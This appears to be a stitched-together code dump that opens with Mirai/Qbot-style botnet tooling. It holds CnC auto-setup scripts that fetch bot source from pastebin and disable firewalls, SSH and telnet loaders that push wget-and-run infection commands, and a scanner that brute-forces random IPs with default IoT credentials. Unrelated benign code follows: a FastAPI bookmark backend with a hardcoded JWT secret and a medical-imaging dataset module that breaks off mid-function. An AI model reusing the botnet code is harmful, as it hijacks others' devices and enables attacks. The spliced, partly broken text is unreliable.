print'\x1b[34mDDD DDD AAA AAA RRR `RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDD DDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDDDDDDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34mDDDDDDDD AAA AAA RRR RRR KKK KKK RRR RRR AAA AAA III '
print'\x1b[34m AA RR RR KK KK RR RR AA II '
print'\x1b[34m A R R K K R R A I '
print'\x1b[1;37m[\x1b[34mDarkRai\x1b[1;37m] \x1b[1;37mCnC AutoSetup \nDeveloped By \x1b[0;31mFlexingOnLamers\x1b[1;37m/\x1b[0;31mCri '
ip = raw_input("\x1b[1;37mEnter Your Server IP:\x1b[1;35m")
user = raw_input("\x1b[1;37mEnter Desired Username:\x1b[1;35m")
passw = raw_input("\x1b[1;37mEnter Desired Password:\x1b[1;35m")
bport = raw_input("\x1b[1;37mEnter Desired BotPort:\x1b[0;31m")
port = raw_input("\x1b[1;37mEnter The Port You Want to screen on:\x1b[1;35m")
print '\x1b[1;35mInstalling Needed Dependencies..\x1b[1;37m'
cri('yum update -y')
cri('yum install python-paramiko gcc screen nano wget httpd iptables perl -y;')
cri('yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y')
cri('yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y')
cri('yum install epel-release -y')
cri('yum install gengetopt -y')
cri('wget -q https://pastebin.com/raw/zgtwniBk -O darkrai.c')
cri('gcc -o darkrai darkrai.c -pthread')
cri('wget -q https://pastebin.com/raw/idY5wpEu -O client.c')
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
cri('service iptabes stop')
cri('service httpd restart')
cri('systemctl stop firewalld')
cri('httpd -k restart')
cri('httpd -krestart')
cri('pkill screen')
replace_line('client.c', 859, 'unsigned char *AllDemDupes[] = { "'+ ip +':'+ bport +'" };\n')
replace_line('client.c', 861, 'char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";\n')
cri("echo "+ user +" "+ passw +" >> login.txt")
cri("python cc7.py client.c "+ ip + "")
cri("screen ./darkrai "+ bport +" 1 "+ port +"")
print '\x1b[1;37mWget/CHARLINE Below!'
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
print '\x1b[1;37mThank you for using the \x1b[1;37m[\x1b[0;31mDarkRai\x1b[1;37m] \x1b[1;37mCnC AutoSetup \n\x1b[0;31mPastebin\x1b[1;37m:\x1b[1;36mhttps://pastebin.com/u/flexingonlamers \n\x1b[0;31mGithub\x1b[1;37m:\x1b[1;36mhttps://github.com/AgentCri/ \n\x1b[0;31mEmail\x1b[1;37m:\x1b[1;36mcri@<EMAIL> \n\x1b[0;31mDiscord\x1b[1;37m:\x1b[1;36mCri#4614'
```
#### File: Qbot/auto setup/ReaperV2Public.py
```python
import subprocess, time
def cri(cmd):
subprocess.call(cmd, shell=True)
def jack(file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
USER = raw_input("\x1b[1;34mUsername\x1b[1;37m:\x1b[1;31m")
PASSWR = raw_input("\x1b[1;34mPassword\x1b[1;37m:\x1b[1;31m")
time.sleep(2)
cri('clear')
print("\x1b[1;37mWelcome \x1b[1;34m"+ USER +" \x1b[1;37mTo the \x1b[1;31mReaper v2 \x1b[1;34mCnC\x1b[1;37m_\x1b[1;34mBashLite \x1b[1;37mAutoSetup!\n\x1b[1;37mDeveloped By \x1b[1;31mcri/\x1b[1;34mcri\x1b[1;37m")
user = raw_input("\x1b[1;34mUsername\x1b[1;37m:\x1b[1;31m")
passw = raw_input("\x1b[1;34mPassword\x1b[1;37m:\x1b[1;31m")
ip = raw_input("\x1b[1;34mServer IP\x1b[1;37m:\x1b[1;31m")
bport = raw_input("\x1b[1;34mBotPort\x1b[1;37m:\x1b[1;31m")
port = raw_input("\x1b[1;34mScreening Port\x1b[1;37m:\x1b[1;31m")
cri('yum install gcc')
cri('yum install screen')
cri('wget -q https://pastebin.com/raw/uUcscZAG -O reaper.c')
cri('gcc -o reaper reaper.c -pthread; rm -rf reaper.c')
cri('wget -q https://pastebin.com/raw/y2D98UHd -O client.c')
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
cri('service iptables stop')
cri('service httpd restart')
jack('client.c', 35, 'unsigned char *commServer[] = {"'+ ip +':'+ bport +'"};\n')
cri('echo '+ user +' '+ passw +' >> reaper.txt')
cri('python cc7.py client.c '+ ip +'')
cri('screen ./reaper '+ bport +' 1 '+ port +'')
print '\x1b[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *'
```
#### File: Scanning/SSH/wget.py
```python
!/usr/bin/python
import sys, re, os, paramiko
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
cmd="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" #command to send
r34d = open(str(sys.argv[1]),'a+')
print "\033[31mStarting Scan!\n"
def w0rk(username,password,ip):
try:
port = 22
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
print "\033[32m[\033[31m+\033[32m] Command Sent: "+ip+"\033[37m\n"
ssh.exec_command(""+cmd+"")
ssh.close()
except:
pass
for line in r34d:
ip_1nfo = line.split(":")
g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],))
g0d.start()
username=ip_1nfo[0]
password=<PASSWORD>[1]
ip=ip_1nfo[2]
g0d.join()
```
#### File: TELNET/PY LOADER/telnet_loader.py
```python
import sys, re, os, paramiko, socket
from threading import Thread
from time import sleep
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
paramiko.util.log_to_file("/dev/null")
rekdevice="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.16.31.10/update.sh; busybox wget http://172.16.31.10/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
print "\033[31m"
print "S-S-SUUUPER fast telnet loader by Milenko"
print
#simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
print "Reads ip:user:pass and simply checks the IP for port 23."
print "Then writes loads the bonet onto it and saves the logins with SSH running to \"telnetopen.txt\""
print "It is VERY fast and extremely efficient."
print "As it splits the file into equal chunks for each thread!"
threads = int(raw_input("Threads: "))
lines = open(sys.argv[1],"r").readlines()
fh = open("telnetopen.txt","a+")
def chunkify(lst,n):
return [ lst[i::n] for i in xrange(n) ]
running = 0
loaded = 0
def printStatus():
while 1:
sleep(10)
print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
if loaded >= 1000:
print "Dayum u got sum phat hax brah :^}"
def haxit(ip, username, password):
tn = telnetlib.Telnet(self.ip)
try:
tn.read_until(b"sername: ")
tn.write(username + "\n")
tn.read_until(b"assword: ")
tn.write(password + "\n")
prompt = tn.read_all()
if "$" in prompt or "#" in prompt:
tn.write(tekdevice + "\n")
print "\033[32m[\033[31m+\033[32m] Command Sent: " + ip + "\033[37m"
except:
pass
def check(chunk, fh):
global running
running += 1
threadID = running
for login in chunk:
if login.startswith("DUP"):
continue # skip DUPS cause fuck em
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.37)
try:
s.connect((login.split(":")[2], 23))
s.close()
print "\033[32m[\033[31m+\033[32m] " + login + " has telnet open. Loading..."
haxit(login.split(":")[0], login.split(":")[1], login.split(":")[2])
fh.write(login + "\r\n")
fh.flush()
except:
pass
print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loads)
running -= 1
lines = map(lambda s: s.strip(), lines) # remove all newlines
chunks = chunkify(lines, threads) # make seperate chunk for each thread
print "STARTING SCAN AND LOAD!!!"
Thread(target = printStatus, args = ()).start()
for thread in xrange(0,threads):
if thread >= 384:
time.sleep(0.2)
try:
Thread(target = check, args = (chunks[thread], fh,)).start()
except:
pass
print "Scanning... Press enter 3 times to stop."
for i in range(0,3):
raw_input()
fh.close()
os.popen("kill -9 " + str(os.getpid()))
```
#### File: Scanning/TELNET/telnet.py
```python
import threading
import sys, os, re, time, socket
from sys import stdout
if len(sys.argv) < 3:
print "Usage: python "+sys.argv[0]+" <threads> <output file>"
sys.exit()
combo = [
"support:support",
"root:vizxv",
"root:xc3511",
"telnet:telnet",
"root:root",
"supervisor:zyad1234",
"root:",
"admin:1234",
"user:user",
"root:antslq",
"admin:admin",
"root:5up"
]
threads = int(sys.argv[1])
output_file = sys.argv[2]
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket()
tn.settimeout(8)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, "ogin:")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
success = True
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
success = True
else:
tn.close()
if success == True:
try:
os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
tn.send("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.168.127.12/update.sh; busybox wget http://192.168.127.12/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh\n")
print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
else:
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def Gen_IP():
not_valid = [10,127,169,172,192]
first = random.randrange(1,256)
while first in not_valid:
first = random.randrange(1,256)
ip = ".".join([str(first),str(random.randrange(1,256)),
str(random.randrange(1,256)),str(random.randrange(1,256))])
return ip
def HaxThread():
while 1:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(370)
IP = Gen_IP()
s.connect((IP, 23))
s.close()
print "\033[32m[\033[31m+\033[32m] FOUND " + IP
thread = router(IP)
thread.start()
except:
pass
if __name__ == "__main__":
threadcount = 0
for i in xrange(0,threads):
try:
threading.Thread(target=HaxThread, args=()).start()
threadcount += 1
except:
pass
print "[*] Started " + str(threadcount) + " scanner threads!"
``` |
{
"source": "1uciuszzz/mark-library",
"score": 3
} |
#### File: mark-library/back-end/database.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import sessionmaker, Session
DB = f"postgresql"
DB_API = f"psycopg2"
HOST = f"127.0.0.1"
PORT = f"5432"
USER = f"<fill here please>"
PASSWORD = f"<fill <PASSWORD>>"
DB_NAME = f"<fill here please>"
DB_URL = f"{DB}+{DB_API}://{USER}:{PASSWORD}@{HOST}:{PORT}/{DB_NAME}"
engine = create_engine(url=DB_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db():
db: Session = SessionLocal()
try:
yield db
finally:
db.close()
```
#### File: router/admin/auth.py
```python
from datetime import datetime, timedelta
from fastapi import APIRouter, Depends
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jose import JWTError, jwt
from sqlalchemy.orm import Session
from schema import Token
from models import User
from util import error, hash
from database import get_db
SECRET_KEY = "28ac48bbb7813016a8edd769ed93628160d5543896c1c2f2a32f61daf6d25ef4"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAY = 7
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/admin/auth/signin")
router = APIRouter(prefix="/admin/auth", tags=["Admin-Auth"])
def create_access_token(data: dict):
to_encode = data.copy()
expire = datetime.utcnow()+timedelta(days=ACCESS_TOKEN_EXPIRE_DAY)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(
claims=to_encode, key=SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
async def get_current_user(token: str = Depends(oauth2_scheme), db: Session = Depends(get_db)) -> User:
try:
payload = jwt.decode(token=token, key=SECRET_KEY, algorithms=[ALGORITHM])
id = payload.get("uid")
if not id:
error.auth_failed("invalid token")
except JWTError:
error.auth_failed("invalid token")
user_rows = db.query(User).all()
user = None
for row in user_rows:
if(str(row.id) == id):
user = row
if not user:
error.notfound_error(f"not found user '{id}'")
return user
@router.post("/signin", response_model=Token)
async def admin_sign_in(payload: OAuth2PasswordRequestForm = Depends(), db: Session = Depends(get_db)):
user_rows = db.query(User.id, User.email, User.password).all()
user = None
for row in user_rows:
if(row.email == payload.username):
user = row
if not user:
error.notfound_error(f"not found user '{payload.username}'")
if not hash.verify_password(payload.password, user.password):
error.auth_failed("password not matched")
token = create_access_token(data={"uid": str(user.id)})
return Token(access_token=token, token_type="bearer")
```
#### File: router/public/p_directory.py
```python
from typing import List
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends
from models import Directory
from schema import DirectorySchema
from database import get_db
router = APIRouter(prefix="/public/d", tags=["Public-Directory"])
@router.get("/", response_model=List[DirectorySchema])
async def get_public_directories(db: Session = Depends(get_db)):
return db.query(Directory).filter(Directory.user_id ==
"6f5ac55a-3291-4b04-aa43-8c685a318e7e").all()
```
#### File: back-end/util/error.py
```python
from fastapi import HTTPException, status
def existed_error(msg: str):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail=[{"msg": msg}])
def notfound_error(msg: str):
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, detail=[{"msg": msg}])
def auth_failed(msg: str):
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED, detail=[{"msg": msg}])
```
#### File: back-end/util/public.py
```python
from fastapi import Depends
from pydantic import EmailStr
from sqlalchemy.orm import Session
from models import Role, User, Directory, Bookmark
from database import get_db
async def get_bookmark_by_id(id: str, db: Session):
b_rows = db.query(Bookmark).all()
b = None
for row in b_rows:
if str(row.id) == id:
b = row
return b
async def get_bookmark_by_dir_id_and_boomark_id(d_id: str, b_id: str, db: Session):
dir = db.query(Directory).filter(Directory.id == d_id).first()
bookmarks = dir.bookmarks
bookmark = None
for row in bookmarks:
if str(row.id) == b_id:
bookmark: Bookmark = row
return bookmark
async def get_bookmark_by_dir_id_and_boomark_name(dir_id: str, b_name: str, db: Session):
dir = db.query(Directory).filter(Directory.id == dir_id).first()
bookmarks = dir.bookmarks
bookmark = None
for row in bookmarks:
if row.name == b_name:
bookmark: Bookmark = row
return bookmark
async def get_role_by_id(id: str, db: Session = Depends(get_db)):
role_rows = db.query(Role).all()
role = None
for row in role_rows:
if str(row.id) == id:
role = row
return role
async def get_user_by_id(id: str, db: Session):
user_rows = db.query(User).all()
user = None
for row in user_rows:
if str(row.id) == id:
user = row
return user
async def get_user_by_email(email: EmailStr, db: Session):
user_rows = db.query(User).all()
user = None
for row in user_rows:
if row.email == email:
user = row
return user
async def get_dir_by_name_and_uid(name: str, uid: str, db: Session):
user_dirs = db.query(Directory).filter(Directory.user_id == uid).all()
dir = None
for row in user_dirs:
if row.name == name:
dir = row
return dir
async def get_dir_by_id(id: str, db: Session):
dir_rows = db.query(Directory).all()
dir = None
for row in dir_rows:
if str(row.id) == id:
dir = row
return dir
async def get_dirs_by_uid(uid: str, db: Session):
dir_rows = db.query(Directory).all()
res = []
for row in dir_rows:
if row.user_id == uid:
res.append(row)
return res
``` |
{
"source": "1ucky40nc3/medicus",
"score": 3
} |
#### File: medicus/data/datasets.py
```python
from typing import Tuple
from typing import Optional
from typing import Callable
from typing import Any
import numpy as np
from PIL import Image
import torch
from .utils import list_dataset_files
from .utils import set_seed
def identity(x: Any):
return x
class SharedTransformDataset:
"""The abstract SharedTransformDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
than it is advised to use datasets such as
`torchvision.datasets.ImageFolder` (for images) instead.
2) The `self.load` function has the be implemented as this is
an abstract class, to load the desired data from different file types.
Attrs:
sample_dir (str): The directory of the sample files.
target_dir (str): The directory if the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this deactivated
than other datasets such as
`torchvision.datasets.ImageFolder`
(for images) should be used.
return_untransformed_sample (bool): States if instead if a (input, target)
tuple a (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".png",
target_format: str = ".png",
**kwargs
) -> None:
samples_list, targets_list = list_dataset_files(
sample_dir, target_dir, sample_format, target_format)
self.samples_list = samples_list
self.targets_list = targets_list
self.len = len(samples_list)
self.transform = transform if transform else identity
self.target_transform = target_transform if target_transform else identity
self.shared_transform = shared_transform if shared_transform else identity
self.share_transform_random_seed = share_transform_random_seed
self.return_untransformed_sample = return_untransformed_sample
def __len__(self) -> int:
return self.len
def share_seed(self) -> bool:
return self.share_transform_random_seed
def load(self, path: str) -> Any:
raise NotImplementedError
def __getitem__(
self,
index: int
) -> Tuple[torch.Tensor, torch.Tensor]:
sample = self.samples_list[index]
target = self.targets_list[index]
sample = self.load(sample)
target = self.load(target)
if self.share_seed():
seed = np.random.randint(2147483647)
set_seed(seed)
sample = self.shared_transform(sample)
input = self.transform(sample)
if self.share_seed:
set_seed(seed)
target = self.shared_transform(target)
target = self.target_transform(target)
if self.return_untransformed_sample:
return input, sample, target
return input, target
class SharedTransformImageDataset(SharedTransformDataset):
"""The SharedTransformImageDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
than it is advised to use datasets such as
`torchvision.datasets.ImageFolder` instead.
Attrs:
sample_dir (str): The directory of the sample files.
target_dir (str): The directory if the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this deactivated
than other datasets such as
`torchvision.datasets.ImageFolder`
should be used.
return_untransformed_sample (bool): States if instead if a (input, target)
tuple a (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".png",
target_format: str = ".png",
**kwargs
) -> None:
args = locals()
del args["self"]
del args["__class__"]
super().__init__(**args)
def load(self, path: str) -> Image:
return Image.open(path).convert("RGB")
class SharedTransformNumpyDataset(SharedTransformDataset):
"""The SharedTransformNumpyDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
than it is advised to use different dataset classes.
2) The samples and targets should have the basic shape of [..., H, W, C].
This is ment to encourage the compatibility the conversion transforms
of `torchvision.transform`. Yet this is not needed and can be configured
freely. ;)
Attrs:
sample_dir (str): The directory of the sample files.
target_dir (str): The directory if the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this deactivated
than other datasets such as
`torchvision.datasets.ImageFolder`
should be used.
return_untransformed_sample (bool): States if instead if a (input, target)
tuple a (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".npy",
target_format: str = ".npy",
**kwargs
) -> None:
args = locals()
del args["self"]
del args["__class__"]
super().__init__(**args)
def load(self, path: str) -> np.ndarray:
return np.load(path)
```
#### File: data/simulated/shapes.py
```python
from typing import Any
from typing import Optional
import os
import numpy as np
from matplotlib import colors
from matplotlib import patches
import matplotlib.pyplot as plt
from PIL import Image
from medicus.data.simulated.noise import generate_perlin_noise
Figure = Any
Axes = Any
COLORS = list(colors.CSS4_COLORS.keys())
def inside(
val: float,
lower_lim: float,
upper_lim: float
) -> float:
val = min(val, upper_lim)
val = max(val, lower_lim)
return val
vinside = np.vectorize(
inside, excluded=["lower_lim", "upper_lim"])
def randn(n: int, scale: float = 1.) -> np.ndarray:
normal = np.random.normal(scale=scale, size=n)
normal = vinside(normal, -1.5, 1.5)
normal = (normal + 1.5) / 3
return normal
def random_color(
class_color: Optional[str] = None
) -> str:
if class_color is None:
return np.random.choice(COLORS)
class_index = COLORS.index(class_color)
p = np.ones(len(COLORS))
p /= len(COLORS) - 1
p[class_index] = 0
return np.random.choice(COLORS, p=p)
def norm(v: np.ndarray) -> np.ndarray:
return (v - v.min()) / (v.max() - v.min())
def rectangle(
x: float,
y: float,
w: float,
h: float,
a: float,
c: float,
**kwargs
) -> patches.Rectangle:
return patches.Rectangle(
xy=(x, y),
width=w,
height=h,
angle=a,
color=c
)
def square(
x: float,
y: float,
d: float,
b: float,
c: float,
a: float,
**kwargs
) -> patches.Rectangle:
return patches.Rectangle(
xy=(x, y),
width=d,
height=d,
angle=b,
color=c,
alpha=a
)
def polygon(
xy: np.ndarray,
c: str,
a: float,
closed: bool = True,
**kwargs
) -> patches.Polygon:
return patches.Polygon(
xy=xy,
color=c,
alpha=a,
closed=closed,
)
def circle(
x: float,
y: float,
r: float,
c: str,
a: float,
**kwargs
) -> patches.Circle:
return patches.Circle(
xy=(x, y),
radius=r,
color=c,
alpha=a
)
def wedge(
x: float,
y: float,
r: float,
t1: float,
t2: float,
w: float,
c: str,
a: float,
**kwargs
) -> patches.Wedge:
return patches.Wedge(
center=(x, y),
r=r,
theta1=t1,
theta2=t2,
width=w,
color=c,
alpha=a
)
def koch_snowflake(order, scale=10):
"""
Return two lists x, y of point coordinates of the Koch snowflake.
Parameters
----------
order : int
The recursion depth.
scale : float
The extent of the snowflake (edge length of the base triangle).
source: https://matplotlib.org/stable/gallery/lines_bars_and_markers/fill.html
"""
def _koch_snowflake_complex(order):
if order == 0:
# initial triangle
angles = np.array([0, 120, 240]) + 90
return scale / np.sqrt(3) * np.exp(np.deg2rad(angles) * 1j)
else:
ZR = 0.5 - 0.5j * np.sqrt(3) / 3
p1 = _koch_snowflake_complex(order - 1) # start points
p2 = np.roll(p1, shift=-1) # end points
dp = p2 - p1 # connection vectors
new_points = np.empty(len(p1) * 4, dtype=np.complex128)
new_points[::4] = p1
new_points[1::4] = p1 + dp / 3
new_points[2::4] = p1 + dp * ZR
new_points[3::4] = p1 + dp / 3 * 2
return new_points
points = _koch_snowflake_complex(order)
x, y = points.real, points.imag
#x = norm(x)
#y = norm(y)
xy = np.zeros((len(x), 2))
xy[:, 0] = x
xy[:, 1] = y
return xy
def distance(p: np.ndarray) -> float:
return np.sqrt(p[0]**2 + p[1]**2)
vdistance = np.vectorize(distance, signature="(n)->()")
def softmax(
value: np.ndarray,
eps: float = 1.0
) -> np.ndarray:
return np.exp(value * eps) / np.sum(np.exp(value))
def add_noise(
v: float,
n: np.ndarray,
) -> np.ndarray:
i = int(v * len(n)) % len(n)
return v + n[i, i]
vadd_noise = np.vectorize(add_noise, excluded=["n"])
def random_distort(
xy: np.ndarray
) -> np.ndarray:
distances = vdistance(xy)
distances = softmax(distances, eps=np.random.rand())
x = xy[:, 0]
y = xy[:, 1]
x *= distances
y *= distances
x = norm(x)
y = norm(y)
noise = generate_perlin_noise(
height=100,
width=100,
octaves=[1, 10],
scaling=[1., .05])
noise = (noise - .5) * .2
x = vadd_noise(x, n=noise)
y = vadd_noise(y, n=noise)
x = norm(x)
y = norm(y)
xy[:, 0] = x
xy[:, 1] = y
return xy
def snowflake(
width: int,
height: int
) -> np.ndarray:
order = np.random.randint(2, 6)
snowflake = koch_snowflake(order)
snowflake = random_distort(snowflake)
scale = np.random.rand()
snowflake[:, 0] = snowflake[:, 0] * width
snowflake[:, 1] = snowflake[:, 1] * height
return snowflake
def random_gauss(
num: int = 200,
sigma: float = .5,
mu: float = 0.
) -> np.ndarray:
min_x, max_x = np.random.rand(2)
min_y, max_y = np.random.rand(2)
min_x *= -1
min_y *= -1
x = np.linspace(min_x, max_x, num)
y = np.linspace(min_y, max_y, num)
x, y = np.meshgrid(x, y)
dist = np.sqrt(x**2 + y**2)
return np.exp(-((dist - mu)**2 / ( 2.0 * sigma**2)))
def random_rect_args(
width: int,
height: int,
min_rect_scale: float,
max_rect_scale: float,
class_color: Optional[str] = None,
scale: float = 1.,
) -> dict:
x, y = randn(2, scale)
w, h = randn(2, scale)
x = x * width
y = y * height
w = inside(w, min_rect_scale, max_rect_scale)
h = inside(h, min_rect_scale, max_rect_scale)
w = w * width
h = h * height
a = 45 * randn(1)
c = random_color(class_color)
return locals()
def random_square_args(
width: int,
height: int,
min_square_scale: float = 0.1,
max_square_scale: float = 0.4,
class_color: Optional[str] = None,
scale: float = 1.,
) -> dict:
x, y = randn(2, scale)
d = np.random.rand()
d = inside(d, min_square_scale, max_square_scale)
d *= min(width, height)
b = 45 * np.random.rand()
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_polygon_args(
width: int,
height: int,
min_polygon_scale: float = 0.1,
max_polygon_scale: float = 0.7,
min_points: int = 3,
max_points: int = 8,
class_color: Optional[str] = None,
) -> dict:
n = np.random.randint(min_points, max_points)
xy = np.random.rand(n, 2)
xy[:, 0] = xy[:, 0] * width
xy[:, 1] = xy[:, 1] * height
s = np.random.rand()
s = inside(s, min_polygon_scale, max_polygon_scale)
xy *= s
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_circle_args(
width: int,
height: int,
min_circle_scale: float = 0.1,
max_circle_scale: float = 0.4,
class_color: Optional[str] = None,
) -> dict:
x, y = np.random.rand(2)
x *= width
y *= height
r = np.random.rand()
r = inside(r, min_circle_scale, max_circle_scale)
r *= min(width, height)
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_wedge_args(
width: int,
height: int,
min_circle_scale: float = 0.1,
max_circle_scale: float = 0.4,
class_color: Optional[str] = None,
) -> dict:
x, y = np.random.rand(2)
x *= width
y *= height
r = np.random.rand()
r = inside(r, min_circle_scale, max_circle_scale)
r *= min(width, height)
t1 = 360. * np.random.rand()
t2 = 360. * np.random.rand()
w = np.random.rand()
w = r * w
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def save_figure_axes(
fig: Figure,
axes: Axes,
file_path: str
) -> None:
extend = axes.get_window_extent(
).transformed(fig.dpi_scale_trans.inverted())
extend.x0 = 2.7364705882352944
extend.x1 = 3.823529411764706
fig.savefig(file_path, bbox_inches=extend)
def generate_rectangles_samples(
height: int,
width: int,
num_samples: int = 20,
num_rects: int = 20,
class_color: str = "red",
min_rect_scale: float = 0.1,
max_rect_scale: float = 0.4,
directory: str = ".",
file_prefix: str = "rectangles",
file_type: str = "png",
seed: int = None
) -> None:
assert class_color in COLORS
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
args = (
width,
height,
min_rect_scale,
max_rect_scale,
class_color
)
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
